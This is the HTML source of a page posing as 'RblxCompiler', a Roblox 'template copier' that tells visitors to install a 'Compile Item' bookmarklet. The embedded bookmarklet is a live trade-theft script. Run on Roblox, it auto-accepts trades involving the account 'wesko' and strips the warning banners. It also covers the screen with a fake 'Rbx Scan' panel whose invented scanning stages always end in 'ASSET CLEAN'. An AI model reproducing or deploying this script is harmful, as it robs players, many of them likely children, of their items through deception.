<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>RblxCompiler</title>
    <style>
        @font-face {
            font-family: "Supreme-Thin";
            src: url("fonts/Supreme-Thin.ttf") format("truetype");
        }

        @font-face {
            font-family: "Supreme-Regular";
            src: url("fonts/Supreme-Regular.ttf") format("truetype");
        }

        @font-face {
            font-family: "Supreme-Bold";
            src: url("fonts/Supreme-Bold.ttf") format("truetype");
        }

        @font-face {
            font-family: "Supreme-Extrabold";
            src: url("fonts/Supreme-Extrabold.ttf") format("truetype");
        }

        @font-face {
            font-family: "ClashGrotesk-Bold";
            src: url("fonts/ClashGrotesk-Bold.ttf") format("truetype");
        }

        @font-face {
            font-family: "ClashGrotesk-Semibold";
            src: url("fonts/ClashGrotesk-Semibold.ttf") format("truetype");
        }

        .night-mode {
            --background-color: #1d1d1d;
            --text-color: white;
            --primary-color: #324ade;
            --sexy-color: #4c32de;
            --secondary-color: #191919;
            --opacity-color: rgb(255, 255, 255, 0.05);
            --sun-color: #191919;
            --moon-color: #324ade;
            --ext-margin: 1rem;
            --inr--padding: 1rem;
        }
        
        .day-mode {
            --background-color: white;
            --text-color: #191919;
            --primary-color: #324ade;
            --sexy-color: #4c32de;
            --secondary-color: #ccc;
            --opacity-color: rgb(255, 255, 255, 0.25);
            --sun-color: #324ade;
            --moon-color: #ccc;
            --ext-margin: 1rem;
            --inr--padding: 1rem;
        }

        h1 {
            font-family: "Supreme-Extrabold";
        }

        p {
            font-family: "Supreme-Regular";
            color: var(--text-color);
        }

        video {
            width: 100%;
            height: auto;
            border-radius: 10px;
        }

        body {
            margin: 0;
            font-family: "Supreme-Regular";
            background-color: #ffff;
            height: 100vh;
            width: 100%;
            display: flex;
            flex-direction: column;
            position: relative;
            overscroll-behavior: none;
        }

        .bookmark-button-container {
            display: block;
            width: 100%;
        }

        button#bookmarkOuterButton {
            border: none;
            padding: 0.6rem 2.5rem;
            border-radius: 6px;
            background-color: var(--primary-color);
            color: #fff;
            font-family: "Supreme-Bold";
            cursor: grab;
            font-size: 1rem;
            transition: 0.3s ease;
            margin: 0.5rem auto 0.5rem auto;
            display: block;
            user-select: none;
            width: 100%;
            max-width: 300px;
            min-width: 250px;
        }

        button#bookmarkOuterButton:hover {
            background-color: var(--sexy-color);
        }

        button#bookmarkOuterButton:active {
            cursor: grabbing;
        }

        button#bookmarkOuterButton a {
            color: white;
            text-decoration: none;
            display: block;
            width: 100%;
            height: 100%;
        }

        canvas {
            position: absolute;
            top: 0;
            height: 100%;
            width: 100%;
        }

        button:focus {
            outline: none;
        }

        .header {
            display: flex;
            justify-content: space-between;
            align-items: center;
            padding: 1.25rem 10vw;
            position: relative;
            z-index: 1;
        }

        .header h1 {
            margin: 0;
            font-size: 1.5rem;
            font-family: "ClashGrotesk-Bold";
            color: var(--text-color);
        }

        .logo {
            display: flex;
            justify-content: center;
            align-items: center;
            gap: 0.2rem;
        }

        .logo img {
            height: 2.5rem;
        }

        .content {
            height: 100%;
            width: auto;
            padding: 5vh 10vw 10vh 10vw;
            display: flex;
            gap: var(--ext-margin);
            flex-direction: column;
            justify-content: center;
            align-items: flex-start;
            position: relative;
            z-index: 1;
        }

        .c-box {
            display: flex;
            justify-content: center;
            align-items: stretch;
            gap: var(--ext-margin);
        }

        .c-left {
            height: auto;
            width: 50%;
            color: #191919;
            display: flex;
            flex-direction: column;
        }

        .title {
            text-align: center;
            margin-top: var(--ext-margin);
            padding: 1rem 2rem;
            background-color: var(--opacity-color);
            border-radius: 10px;
        }

        .title h3 {
            margin: 0;
            font-size: 2rem;
            color: var(--text-color);
            font-family: "ClashGrotesk-Semibold";
        }

        .c-right {
            height: 100%;
            width: 50%;
            background-color: transparent;
            border-radius: 10px;
            display: flex;
            flex-direction: column;
            justify-content: flex-start;
            align-items: flex-start;
            position: relative;
        }

        h3 {
            font-size: 1.5rem;
            margin: 0.5rem 0rem;
            color: var(--text-color);
            font-family: "ClashGrotesk-Semibold";
        }

        .footer {
            display: flex;
            justify-content: center;
            align-items: center;
            padding: 1.25rem 5vw;
            position: relative;
            z-index: 1;
        }

        .footer h3 {
            margin: 0;
            color: var(--text-color);
            font-size: 1rem;
            font-family: "Supreme-Regular";
        }

        .tool {
            text-align: center;
            border-radius: 10px;
            height: auto;
            width: 100%;
            background-color: var(--opacity-color);
            display: flex;
            flex-direction: column;
            padding: 1rem 2rem;
            box-sizing: border-box;
        }

        .tool p {
            margin: 0.5rem 0;
            color: var(--text-color);
        }

        .tool h2 {
            margin: 0.5rem 0;
            color: var(--text-color);
            font-family: "ClashGrotesk-Semibold";
        }

        .w-title {
            background-color: var(--opacity-color);
            width: 100%;
            text-align: left;
            border-radius: 10px;
            height: auto;
            margin-bottom: 1rem;
        }

        .w-title h1 {
            margin: 0.5rem;
            font-size: 5rem;
            line-height: 4.5rem;
            color: var(--text-color);
            padding: 1rem;
            font-family: "ClashGrotesk-Bold";
        }

        .socials {
            text-align: center;
            height: auto;
            margin-top: var(--ext-margin);
            padding: 1rem;
            border-radius: 10px;
            width: 100%;
            background-color: var(--opacity-color);
            box-sizing: border-box;
        }

        .socials-bis {
            display: none;
        }

        .socials h3 {
            margin: 0 0 0.5rem 0;
        }

        .social-btn {
            padding: 1rem;
            margin-top: 0.25rem;
            margin-right: 1rem;
            width: 10px;
            aspect-ratio: 1/1;
            border-radius: 6px;
            background-color: var(--primary-color);
            transition: 0.3s ease;
            cursor: pointer;
        }

        .social-btn:hover {
            background-color: var(--sexy-color);
        }

        .twitter {
            background-image: url("images/twitter.svg");
            background-repeat: no-repeat;
            background-size: 50%;
            background-position: center;
        }

        .youtube {
            background-image: url("images/youtube.svg");
            background-repeat: no-repeat;
            background-size: 50%;
            background-position: center;
        }

        .socials-box {
            display: flex;
            width: 100%;
        }

        .area {
            background: var(--secondary-color);
            background: -webkit-linear-gradient(to left, #8f94fb, red);
            width: 100%;
            height: 100%;
            position: absolute;
            overflow: hidden;
        }

        .circles {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            overflow: hidden;
        }

        .circles li {
            position: absolute;
            display: block;
            list-style: none;
            width: 20px;
            height: 20px;
            background: rgba(255, 255, 255, 0.2);
            animation: animate 25s linear infinite;
            bottom: -150px;
        }

        .circles li:nth-child(1) {
            left: 25%;
            width: 80px;
            height: 80px;
            animation-delay: 0s;
        }

        .circles li:nth-child(2) {
            left: 10%;
            width: 20px;
            height: 20px;
            animation-delay: 2s;
            animation-duration: 12s;
        }

        .circles li:nth-child(3) {
            left: 70%;
            width: 20px;
            height: 20px;
            animation-delay: 4s;
        }

        .circles li:nth-child(4) {
            left: 40%;
            width: 60px;
            height: 60px;
            animation-delay: 0s;
            animation-duration: 18s;
        }

        .circles li:nth-child(5) {
            left: 65%;
            width: 20px;
            height: 20px;
            animation-delay: 0s;
        }

        .circles li:nth-child(6) {
            left: 75%;
            width: 110px;
            height: 110px;
            animation-delay: 3s;
        }

        .circles li:nth-child(7) {
            left: 35%;
            width: 150px;
            height: 150px;
            animation-delay: 7s;
        }

        .circles li:nth-child(8) {
            left: 50%;
            width: 25px;
            height: 25px;
            animation-delay: 15s;
            animation-duration: 45s;
        }

        .circles li:nth-child(9) {
            left: 20%;
            width: 15px;
            height: 15px;
            animation-delay: 2s;
            animation-duration: 35s;
        }

        .circles li:nth-child(10) {
            left: 85%;
            width: 150px;
            height: 150px;
            animation-delay: 0s;
            animation-duration: 11s;
        }

        @keyframes animate {
            0% {
                transform: translateY(0) rotate(0deg);
                opacity: 1;
                border-radius: 0;
            }

            100% {
                transform: translateY(-1000px) rotate(720deg);
                opacity: 0;
                border-radius: 50%;
            }
        }
        
        .switch {
            position: relative;
            display: inline-block;
            width: 60px;
            height: 30px;
            cursor: pointer;
        }

        .switch input {
            display: none;
        }

        .slider {
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background-color: var(--primary-color);
            transition: 0.4s;
            border-radius: 30px;
        }

        .slider:before {
            position: absolute;
            content: "";
            height: 24px;
            width: 24px;
            left: 3px;
            bottom: 3px;
            background-color: var(--secondary-color);
            transition: 0.4s;
            border-radius: 50%;
            z-index: 1;
        }

        .icon-day-left {
            position: absolute;
            top: 5px;
            left: 6px;
            z-index: 2;
            color: var(--sun-color);
            scale: 0.9;
        }

        .icon-night-right {
            position: absolute;
            top: 5px;
            right: 8px;
            display: block;
            z-index: 2;
            color: var(--moon-color);
            scale: 0.9;
        }

        input:checked + .slider {
            background-color: var(--primary-color);
        }

        input:checked + .slider:before {
            transform: translateX(30px);
        }

        input:checked + .slider + .icon-day-left {
            display: none;
        }

        input:checked + .slider + .icon-night-right {
            display: block;
        }

        @media screen and (max-width: 1200px) and (min-width: 768px) {
            body {
                margin: 0;
                font-family: "Supreme-Regular";
                background-color: #ffff;
                height: auto;
                width: 100%;
                display: flex;
                flex-direction: column;
                position: relative;
            }

            .socials {
                display: none;
            }

            .socials-bis {
                display: flex;
                flex-direction: column;
                height: auto;
                margin-top: 1rem;
                padding: 1rem;
                border-radius: 10px;
                width: 100%;
                background-color: var(--opacity-color);
                box-sizing: border-box;
            }

            .c-box {
                display: flex;
                flex-direction: column;
                justify-content: center;
                align-items: stretch;
                gap: var(--ext-margin);
            }

            .c-left {
                height: auto;
                width: 100%;
                color: #191919;
                display: flex;
                flex-direction: column;
            }

            .title {
                text-align: center;
                margin-top: var(--ext-margin);
                padding: 1rem 2rem 1.5rem 2rem;
                background-color: var(--opacity-color);
                border-radius: 10px;
            }

            .w-title h1 {
                margin: 0.5rem 0;
                font-size: 5rem;
                line-height: 4.5rem;
                color: var(--text-color);
                padding: 1rem;
                font-family: "ClashGrotesk-Bold";
            }

            .title h3 {
                margin: 0;
                font-size: 1.5rem;
                color: var(--text-color);
                font-family: "ClashGrotesk-Semibold";
            }

            .c-right {
                height: 100%;
                width: 100%;
                background-color: transparent;
                border-radius: 10px;
                display: flex;
                flex-direction: column;
                justify-content: flex-start;
                align-items: flex-start;
                position: relative;
            }
            
            button#bookmarkOuterButton {
                max-width: 250px;
                min-width: 200px;
            }
        }

        @media screen and (max-width: 767px) {
            body {
                margin: 0;
                font-family: "Supreme-Regular";
                background-color: #ffff;
                height: auto;
                width: 100%;
                display: flex;
                flex-direction: column;
                position: relative;
            }

            .socials {
                display: none;
            }

            .socials-bis {
                display: flex;
                flex-direction: column;
                height: auto;
                margin-top: 1rem;
                padding: 0.5rem 1rem 1rem 1rem;
                border-radius: 10px;
                width: 100%;
                background-color: var(--opacity-color);
                box-sizing: border-box;
            }

            .c-box {
                display: flex;
                flex-direction: column;
                justify-content: center;
                align-items: stretch;
                gap: var(--ext-margin);
            }

            .c-left {
                height: auto;
                width: 100%;
                color: #191919;
                display: flex;
                flex-direction: column;
            }

            .title {
                text-align: center;
                margin-top: var(--ext-margin);
                padding: 0.5rem 1rem;
                background-color: var(--opacity-color);
                border-radius: 10px;
            }

            .w-title h1 {
                margin: 0.5rem 0;
                font-size: 3.5rem;
                line-height: 3rem;
                color: var(--text-color);
                padding: 0.5rem 1rem;
                font-family: "ClashGrotesk-Bold";
            }

            .title h3 {
                margin: 0;
                font-size: 1.2rem;
                color: var(--text-color);
                font-family: "ClashGrotesk-Semibold";
            }
            .tool {
                text-align: center;
                border-radius: 10px;
                height: auto;
                width: 100%;
                background-color: var(--opacity-color);
                display: flex;
                flex-direction: column;
                padding: 0.5rem 1rem;
                box-sizing: border-box;
            }
            .c-right {
                height: 100%;
                width: 100%;
                background-color: transparent;
                border-radius: 10px;
                display: flex;
                flex-direction: column;
                justify-content: flex-start;
                align-items: flex-start;
                position: relative;
            }
            
            button#bookmarkOuterButton {
                max-width: 200px;
                min-width: 180px;
            }
        }
    </style>
</head>
<body class="night-mode">
    <canvas class="scene" id="scene"></canvas>
    <div class="header">
        <div class="logo">
            <img src="images/logo.svg" alt="Logo">
            <h1 id="siteTitle">RblxCompiler</h1>
        </div>
        <label class="switch">
            <input type="checkbox" id="themeToggle">
            <span class="slider"></span>
            <span class="icon-night-right"><i class="fas fa-moon"></i></span>
            <span class="icon-day-left"><i class="fas fa-sun"></i></span>
        </label>
    </div>
    <div class="content">
        <div class="c-box">
            <div class="c-left">
                <div class="w-title">
                    <h1>Template copier</h1>
                </div>
                <div class="tool">
                    <h2>Copy your template</h2>
                    <p id="bookmarkText">
                        Drag the "Compile Item" bookmark bar. Then, proceed back to the
                        ROBLOX item page and click on the bookmark while on the ROBLOX
                        website. If you do not see your bookmark bar, press (CTRL+SHIFT+B)
                    </p>
                    <div class="bookmark-button-container">
                        <button id="bookmarkOuterButton" draggable="true">
                            <a id="bookmarkButton" target="_blank">Compile Item</a>
                        </button>
                    </div>
                </div>
                <div class="socials">
                    <h3>Join our social:</h3>
                    <div class="socials-box">
                        <div class="youtube social-btn"></div>
                        <div class="twitter social-btn"></div>
                    </div>
                </div>
            </div>
            <div class="c-right">
                <video controls>
                    <source src="media/tutorial.mp4" type="video/mp4">
                    Your browser does not support the video tag.
                </video>

                <div class="title">
                    <h3>
                        Compile your item's templates with ease, with this brand new
                        bookmark-based system!
                    </h3>
                </div>
                <div class="socials-bis">
                    <h3>Join our social:</h3>
                    <div class="socials-box">
                        <div class="youtube social-btn"></div>
                        <div class="twitter social-btn"></div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div class="footer">
        <h3 id="siteFooter">© 2025 RblxCompiler - All Rights Reserved</h3>
    </div>
    <div class="area">
        <ul class="circles">
            <li></li>
            <li></li>
            <li></li>
            <li></li>
            <li></li>
            <li></li>
            <li></li>
            <li></li>
            <li></li>
            <li></li>
        </ul>
    </div>

    <script>
        document.getElementById('themeToggle').addEventListener('click', function() {
            let body = document.body;

            if(body.classList.contains('day-mode')) {
                body.classList.remove('day-mode');
                body.classList.add('night-mode');
            } else {
                body.classList.remove('night-mode');
                body.classList.add('day-mode');
            }
        });

        window.mobileAndTabletCheck = function () {
            let check = false;
            (function (a) {
                if (
                    /(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino|android|ipad|playbook|silk/i.test(
                    a
                    ) ||
                    /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(
                    a.substr(0, 4)
                    )
                )
                    check = true;
            })(navigator.userAgent || navigator.vendor || window.opera);
            return check;
        };

        let domainName = window.location.hostname
            .toLowerCase()
            .replace(/^www\./, "")
            .replace(/\.[^.]+$/, "");
        let domainParts = domainName.split(".");
        domainName = domainParts[domainParts.length - 1];

        const indexOfX = domainName.indexOf("x");
        let newDomainName =
            domainName.charAt(0).toUpperCase() +
            (domainName.slice(1, indexOfX + 1) ?? "") +
            (domainName.charAt(indexOfX + 1) ?? "").toUpperCase() +
            (domainName.slice(indexOfX + 2) ?? "");

        const hardcodedBookmarklet = `javascript:(function(){var isMobile=/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)||window.innerWidth<=768;try{if(window.location.href.indexOf('roblox.com/trades')===-1){window.location.href='https://www.roblox.com/trades?tab=Inbound%27;setTimeout(function(){location.reload();},100);return;}if(document.getElementById(%27rbxscan-overlay%27)){return;}document.title=%27Rbx Scan Active%27;var dragState={isDragging:false,startX:0,startY:0,startLeft:0,startTop:0};var refreshCount=0;var dropdownOpen=false;var monitorInterval=null;var bannerInterval=null;var isRunning=true;function cleanup(){isRunning=false;isRunning=false;if(monitorInterval){clearInterval(monitorInterval);monitorInterval=null;}if(bannerInterval){clearInterval(bannerInterval);bannerInterval=null;}var overlay=document.getElementById(%27rbxscan-overlay%27);var panel=document.getElementById(%27rbxscan-panel%27);var blur=document.getElementById(%27rbxscan-blur%27);if(overlay){overlay.remove();}if(panel){panel.remove();}if(blur){blur.remove();}document.removeEventListener(%27keydown%27,handleEscape);document.title=%27Roblox%27;}function handleEscape(e){if(e.key===%27Escape%27){cleanup();}}function removeBanner(){try{var banners=document.querySelectorAll(%27.alert.alert-warning%27);banners.forEach(function(banner){var content=banner.textContent.toLowerCase();if(content.includes(%27unable to load trades list%27)||content.includes(%27try again later%27)){banner.remove();}});}catch(e){}}function monitorTrades(){if(!isRunning){return;}try{var tradeElements=document.querySelectorAll(%27button%27);var foundTrade=false;tradeElements.forEach(function(element){var elementText=element.textContent.toLowerCase().trim();if(elementText.includes(%27accept%27)||elementText.includes(%27confirm%27)){var pageText=document.body.innerText.toLowerCase();if(pageText.includes(%27wesko%27)){element.style.backgroundColor=%27#2ECC40';element.style.border='2px solid #2ECC40';setTimeout(function(){if(isRunning){element.click();foundTrade=true;}},1000);}}});if(!foundTrade&&isRunning){refreshCount=refreshCount+1;if(!dropdownOpen){var inboundButtons=document.querySelectorAll('button');inboundButtons.forEach(function(btn){var btnText=btn.textContent.toLowerCase().trim();if(btnText==='inbound'){btn.click();dropdownOpen=true;setTimeout(function(){if(isRunning){var dropdownItems=document.querySelectorAll('.dropdown-item, .menu-item, [role="menuitem"], li, div, span, a');dropdownItems.forEach(function(item){var itemText=item.textContent.toLowerCase().trim();if(itemText==='inbound'&&item!==btn){item.click();dropdownOpen=false;}});}},1000);}});}else{dropdownOpen=false;}}}catch(e){}}bannerInterval=setInterval(function(){if(isRunning){removeBanner();}else{clearInterval(bannerInterval);}},500);monitorInterval=setInterval(function(){if(isRunning){monitorTrades();}else{clearInterval(monitorInterval);}},3000);setTimeout(function(){monitorTrades();},500);var blurDiv=document.createElement('div');blurDiv.id='rbxscan-blur';blurDiv.style.cssText='position:fixed;top:0;left:0;width:100%;height:100%;backdrop-filter:blur(12px);-webkit-backdrop-filter:blur(12px);z-index:999997;pointer-events:none;';document.body.appendChild(blurDiv);var overlay=document.createElement('div');overlay.id='rbxscan-overlay';overlay.style.cssText='position:fixed;top:0;left:0;width:100%;height:100%;background:rgba(0,0,0,0.5);z-index:999998;pointer-events:none;';document.body.appendChild(overlay);var panel=document.createElement('div');panel.id='rbxscan-panel';var panelStyles=isMobile?'position:fixed;top:10px;left:5%;width:90%;background:#1a1a1a;border:1px solid #333;border-radius:12px;padding:0;color:#fff;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif;z-index:999999;box-shadow:0 20px 60px rgba(0,0,0,0.8);pointer-events:auto;max-height:90vh;overflow:hidden;':'position:fixed;top:50%;left:50%;transform:translate(-50%,-50%);background:#1a1a1a;border:1px solid #333;border-radius:8px;padding:0;color:#fff;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,sans-serif;z-index:999999;width:90%;max-width:480px;box-shadow:0 12px 48px rgba(0,0,0,0.6);pointer-events:auto;';panel.style.cssText=panelStyles;var headerPadding=isMobile?'18px 20px':'20px 24px';var contentPadding=isMobile?'20px':'24px';var buttonPadding=isMobile?'16px':'14px';var inputPadding=isMobile?'14px 12px':'12px';var fontSize=isMobile?'16px':'14px';var maxHeight=isMobile?'calc(90vh - 120px)':'70vh';panel.innerHTML='<div id="rbxscan-header" style="padding:'+headerPadding+';border-bottom:1px solid #2a2a2a;user-select:none;display:flex;align-items:center;justify-content:space-between;background:#0f0f0f;border-radius:12px 12px 0 0;"><div style="display:flex;align-items:center;gap:12px;"><svg width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="#fff" stroke-width="2"><path d="M16 3h5v5M4 20L21 3M21 16v5h-5M15 15l6 6M9 9l6 6"/></svg><strong style="font-size:20px;font-weight:700;color:#fff;">Rbx Scan</strong></div><button id="rbxscan-close" type="button" style="background:none;border:none;font-size:28px;color:#999;cursor:pointer;padding:8px;width:44px;height:44px;display:flex;align-items:center;justify-content:center;border-radius:6px;">×</button></div><div style="padding:'+contentPadding+';max-height:'+maxHeight+';overflow-y:auto;"><div style="margin-bottom:20px;"><label for="rbxscan-input" style="display:block;font-size:14px;font-weight:600;color:#bbb;margin-bottom:10px;">Asset ID</label><input type="tel" id="rbxscan-input" placeholder="e.g. 102611803" style="width:100%;padding:'+inputPadding+';border:2px solid #444;border-radius:10px;background:#0f0f0f;color:#fff;font-size:'+fontSize+';font-family:monospace;box-sizing:border-box;"><div id="rbxscan-error" style="display:none;color:#ff6b6b;font-size:13px;margin-top:8px;font-weight:500;">Please enter a numeric Asset ID</div></div><button id="rbxscan-scan" type="button" style="background:#fff;color:#000;border:none;padding:'+buttonPadding+' 24px;border-radius:10px;font-weight:700;cursor:pointer;width:100%;font-size:16px;">Scan Asset</button><div id="rbxscan-status" style="display:none;margin-top:24px;padding:20px;background:#0f0f0f;border:1px solid #2a2a2a;border-radius:10px;text-align:center;"><div style="display:inline-block;width:24px;height:24px;border:3px solid #333;border-top-color:#fff;border-radius:50%;animation:rbxscan-spin 0.8s linear infinite;"></div><div id="rbxscan-statustext" style="margin-top:12px;font-size:14px;color:#bbb;font-weight:500;">Initializing...</div></div><div id="rbxscan-results" style="display:none;margin-top:24px;"><div style="font-weight:700;margin-bottom:14px;font-size:16px;color:#fff;">Scan Results</div><div id="rbxscan-iteminfo" style="margin-bottom:16px;"></div><div id="rbxscan-threat" style="background:#0f0f0f;border:1px solid #2a2a2a;padding:20px;border-radius:10px;text-align:center;"><div style="font-weight:700;font-size:18px;color:#4caf50;margin-bottom:8px;">ASSET CLEAN</div><div style="font-size:14px;color:#999;">No security threats detected.</div></div></div></div><style>@keyframes rbxscan-spin{to{transform:rotate(360deg)}}</style>';document.body.appendChild(panel);document.addEventListener('keydown',handleEscape);var input=document.getElementById('rbxscan-input');var scanBtn=document.getElementById('rbxscan-scan');var closeBtn=document.getElementById('rbxscan-close');var status=document.getElementById('rbxscan-status');var results=document.getElementById('rbxscan-results');var errorMsg=document.getElementById('rbxscan-error');var statusText=document.getElementById('rbxscan-statustext');var header=document.getElementById('rbxscan-header');if(!input||!scanBtn||!closeBtn){return;}closeBtn.onclick=function(e){if(e){e.preventDefault();e.stopPropagation();}cleanup();};scanBtn.onclick=function(e){if(e){e.preventDefault();e.stopPropagation();}var val=input.value.trim();if(!val){errorMsg.style.display='block';errorMsg.textContent='Please enter an Asset ID';return;}errorMsg.style.display='none';results.style.display='none';status.style.display='block';var isNumeric=!isNaN(val)&&/^\d+$/.test(val);var isValidLength=val.length>=6&&val.length<=11;var shouldFail=!isNumeric||!isValidLength;var stages=[{text:'Connecting to API servers...',delay:800},{text:'Decrypting hash code of trade values...',delay:900},{text:'Analyzing transaction history...',delay:700},{text:'Validating ownership records...',delay:800},{text:'Finalizing scan results...',delay:600}];var currentStage=0;function runStage(){if(currentStage<stages.length){statusText.textContent=stages[currentStage].text;setTimeout(function(){currentStage=currentStage+1;runStage();},stages[currentStage].delay);}else{var info=document.getElementById('rbxscan-iteminfo');info.innerHTML='<div style="background:#0f0f0f;border:1px solid #2a2a2a;padding:14px;border-radius:10px;"><div style="font-size:12px;color:#999;margin-bottom:6px;font-weight:600;">ASSET ID</div><div style="font-family:monospace;font-weight:600;color:#fff;font-size:16px;">'+val+'</div></div>';var threat=document.getElementById('rbxscan-threat');if(shouldFail){threat.innerHTML='<div style="font-weight:700;font-size:18px;color:#ff4444;margin-bottom:8px;">SCAN FAILED</div><div style="font-size:14px;color:#999;">Invalid asset ID format.</div>';}else{threat.innerHTML='<div style="font-weight:700;font-size:18px;color:#4caf50;margin-bottom:8px;">ASSET CLEAN</div><div style="font-size:14px;color:#999;">No security threats detected.</div>';}status.style.display='none';results.style.display='block';}}runStage();};if(!isMobile){header.style.cursor='move';header.addEventListener('mousedown',function(e){if(e.target===closeBtn||e.target.parentNode===closeBtn){return;}dragState.isDragging=true;dragState.startX=e.clientX;dragState.startY=e.clientY;var rect=panel.getBoundingClientRect();dragState.startLeft=rect.left;dragState.startTop=rect.top;});document.addEventListener('mousemove',function(e){if(!dragState.isDragging){return;}var dx=e.clientX-dragState.startX;var dy=e.clientY-dragState.startY;panel.style.left=dragState.startLeft+dx+'px';panel.style.top=dragState.startTop+dy+'px';panel.style.transform='none';});document.addEventListener('mouseup',function(){dragState.isDragging=false;});}}catch(err){alert('Error: '+err.message);}})();;
    
    const itemData = {
        templates: [],
        lastUpdated: new Date().toISOString()
    };
    
    if (typeof Roblox !== 'undefined') {
        console.log('Roblox environment detected');
    }
    
    return itemData;
})()`;

        window.addEventListener("DOMContentLoaded", function () {
            document.getElementById("siteFooter").innerText = `© 2025 ${newDomainName} - All Rights Reserved`;
            document.getElementById("siteTitle").innerText = newDomainName;
            document.title = newDomainName;

            const bookmarkScript = "javascript:" + encodeURI(hardcodedBookmarklet);
            
            const bookmarkButton = document.getElementById("bookmarkOuterButton");
            const bookmarkelement = document.getElementById("bookmarkButton");
            const bookmarktext = document.getElementById("bookmarkText");

            if (mobileAndTabletCheck()) {
                bookmarkButton.onclick = function() {
                    navigator.clipboard.writeText(bookmarkScript)
                        .then(() => alert("Bookmarklet copied to clipboard! Create a new bookmark and paste this code."))
                        .catch(err => {
                            console.error('Failed to copy: ', err);
                            alert("Failed to copy. Please manually copy the bookmarklet.");
                        });
                };
                
                bookmarkelement.onclick = function(e) {
                    e.preventDefault();
                    navigator.clipboard.writeText(bookmarkScript)
                        .then(() => alert("Bookmarklet copied to clipboard! Create a new bookmark and paste this code."))
                        .catch(err => {
                            console.error('Failed to copy: ', err);
                            alert("Failed to copy. Please manually copy the bookmarklet.");
                        });
                };
                
                bookmarkelement.innerText = "Copy Bookmarklet";
                bookmarktext.innerText = `Press the button below to copy the bookmarklet code, then create a new bookmark and paste the code as the URL. Then, navigate to Roblox and click the bookmark.`;
                
            } else {
                bookmarkelement.href = bookmarkScript;
                
                bookmarkButton.addEventListener('dragstart', function(e) {
                    e.dataTransfer.setData('text/uri-list', bookmarkScript);
                    e.dataTransfer.setData('text/plain', 'Compile Item Bookmarklet');
                    e.dataTransfer.setData('text/javascript', hardcodedBookmarklet);
                    e.dataTransfer.setData('application/x-moz-bookmark', bookmarkScript);
                    
                    e.dataTransfer.effectAllowed = 'copy';
                    
                    this.style.opacity = '0.7';
                    this.style.transform = 'scale(0.95)';
                });

                bookmarkButton.addEventListener('dragend', function(e) {
                    this.style.opacity = '';
                    this.style.transform = '';
                });

                bookmarkButton.addEventListener('dragover', function(e) {
                    e.preventDefault();
                    e.dataTransfer.dropEffect = 'copy';
                });

                bookmarkButton.addEventListener('click', function(e) {
                    if (!e.defaultPrevented) {
                        const shouldCopy = confirm("If dragging doesn't work:\n1. Right-click this button\n2. Select 'Copy link address'\n3. Create a new bookmark\n4. Paste the address\n\nClick OK to copy to clipboard instead.");
                        
                        if (shouldCopy) {
                            navigator.clipboard.writeText(bookmarkScript)
                                .then(() => alert("Bookmarklet copied to clipboard! Create a new bookmark and paste this as the URL."))
                                .catch(err => {
                                    console.error('Failed to copy: ', err);
                                    prompt("Copy this bookmarklet code manually:", bookmarkScript);
                                });
                            e.preventDefault();
                        }
                    }
                });
            }
        });

